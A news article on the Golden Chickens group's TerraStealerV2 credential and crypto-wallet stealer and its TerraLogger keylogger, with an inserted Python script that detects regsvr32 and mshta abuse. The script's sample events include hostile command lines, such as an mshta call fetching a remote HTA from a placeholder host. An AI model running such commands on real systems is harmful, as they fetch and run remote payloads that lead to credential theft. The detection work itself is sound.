Golden Chickens Unleashes New Malware Tools Targeting Browsers, Crypto Wallets

Coin World, Monday, May 5, 2025 2:16 am ET

Cybercriminal group Golden Chickens has resurfaced with a new set of malware tools designed to steal credentials, log keystrokes, and compromise user security on a large scale. The two new threats, named TerraStealerV2 malware and TerraLogger, are the latest additions to the group’s malware-as-a-service (MaaS) offerings, showcasing their ongoing efforts to evolve their cybercrime tactics.

Golden Chickens, also known as Venom Spider, has been linked to significant credential theft and infiltration campaigns in the past, most notably through its More_eggs malware. The new variants, however, indicate a strategic shift toward more aggressive targeting of browsers, crypto wallets, and user keystrokes. These malware tools are being distributed through various file formats, including EXE, MSI, and LNK, making them difficult to detect and easy to spread.

TerraStealerV2 malware is engineered to extract sensitive user data from browsers and cryptocurrency wallets. It scans for browser credentials, accesses saved logins, and attempts to extract information from browser extensions, potentially leading to crypto wallet theft if the extensions are used for asset management or trading. The malware is often delivered via OCX payloads from shady domains. Once downloaded, it uses legitimate Windows utilities like regsvr32.exe and mshta.exe to execute its payload while evading security systems. Although it attempts to pull Chrome login data, it fails to bypass the newer Application Bound Encryption (ABE) protocols introduced in Chrome post-July 2024, suggesting that the tool may still be under active development or simply outdated. The data collected by TerraStealerV2 is sent to Telegram channels and external servers, providing attackers with real-time access to user credentials and activity.


TerraLogger, on the other hand, functions as a standalone keylogger, silently capturing every keystroke typed on the infected machine. From login credentials to personal chats, this malware can record it all. Although TerraLogger does not currently exfiltrate data or interact with any command-and-control (C2) servers, its design suggests future integration with broader malware campaigns. Golden Chickens may be planning to pair this keylogger with other tools in their ecosystem to create a more comprehensive infection chain. Despite its simplicity, TerraLogger poses a significant threat to browser security, especially when used in combination with data-exfiltration tools like TerraStealerV2.

Golden Chickens is employing a variety of file types to distribute their malware, increasing the chances of infection. Common delivery formats include executables (EXE), Microsoft Installer files (MSI), Windows Shortcut files (LNK), and OLE Control Extensions (OCX). This multi-format approach makes it more likely for unsuspecting users to install the malware. Once executed, the payloads spring into action, mining for data or logging inputs while avoiding basic antivirus scans. The use of known Windows utilities and Telegram for data transfer provides both obfuscation and control, as messages can be quickly customized or deleted on the attacker’s end.
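The regsvr32.exe and mshta.exe execution of downloaded OCX payloads described above can be hunted for in process-creation telemetry. The following is an added example, not code from the article or from any vendor report: the event fields `image` and `cmdline`, the rule names, the list of user-writable directories, and the sample events are all assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumption: locations a standard user can write to, where a downloaded
# OCX would typically land. Adjust to your environment.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
REMOTE = re.compile(r"^https?://", re.I)

def split_args(cmdline):
    """Split a Windows command line, keeping double-quoted paths whole."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def classify(event):
    """Return the names of the rules a process-creation event matches."""
    image = PureWindowsPath(event["image"]).name.lower()
    args = [a.lower() for a in split_args(event["cmdline"])[1:]]
    hits = []
    if image == "regsvr32.exe":
        # Switches (/s, /i:..., /n, /u) start with "/" or "-"; the rest are modules.
        modules = [a for a in args if not a.startswith(("/", "-"))]
        if any(m.endswith(".ocx") and any(d in m for d in USER_WRITABLE)
               for m in modules):
            hits.append("regsvr32_ocx_user_writable")
    elif image == "mshta.exe":
        if any(REMOTE.match(a) for a in args):
            hits.append("mshta_remote_url")
    return hits

# Constructed sample events (not taken from any real incident).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Users\alice\AppData\Local\Temp\ctl 1.ocx"'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\grid.ocx"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://files.example.invalid/update.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\App\help.hta"'},
]

def scan(events):
    """Return {event index: [rule names]} for events that match any rule."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], rules)
```

Registrations from installer-owned directories such as Program Files are left unflagged to keep noise down; the path filter is the part to tune first.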

The emergence of TerraStealerV2 signals a renewed focus on browser-based attacks. With many users storing credentials in browsers or using browser extensions to manage cryptocurrencies, a single infection could compromise access to financial platforms, crypto wallets, or even corporate intranets. The rise of crypto wallet theft through malware like TerraStealerV2 reflects a broader trend in cybercrime, where stealers are becoming more modular, customizable, and harder to detect. Even though both TerraStealerV2 and TerraLogger appear to still be under development, their current functionality is already dangerous. As Golden Chickens continues to refine these tools, we can expect even more stealth, deeper system penetration, and broader targeting capabilities.

The arrival of new malware tools from Golden Chickens shows how cybercriminals keep developing new methods. Although TerraLogger is limited to being purely a keylogger, it could supply keylogging alongside TerraStealerV2 or the rest of the malware toolkit as part of a larger multi-stage threat. With more reports of browser vulnerabilities and stolen crypto wallets, it is important to keep up with the tooling that groups like Golden Chickens continue to make available. Users and organizations should track everything they download, limit the amount of insecure software they use, and ensure their browsers are up to date with the latest security protocols. TerraStealerV2 and TerraLogger are just the start; they will continue to evolve, just as our responses must evolve.
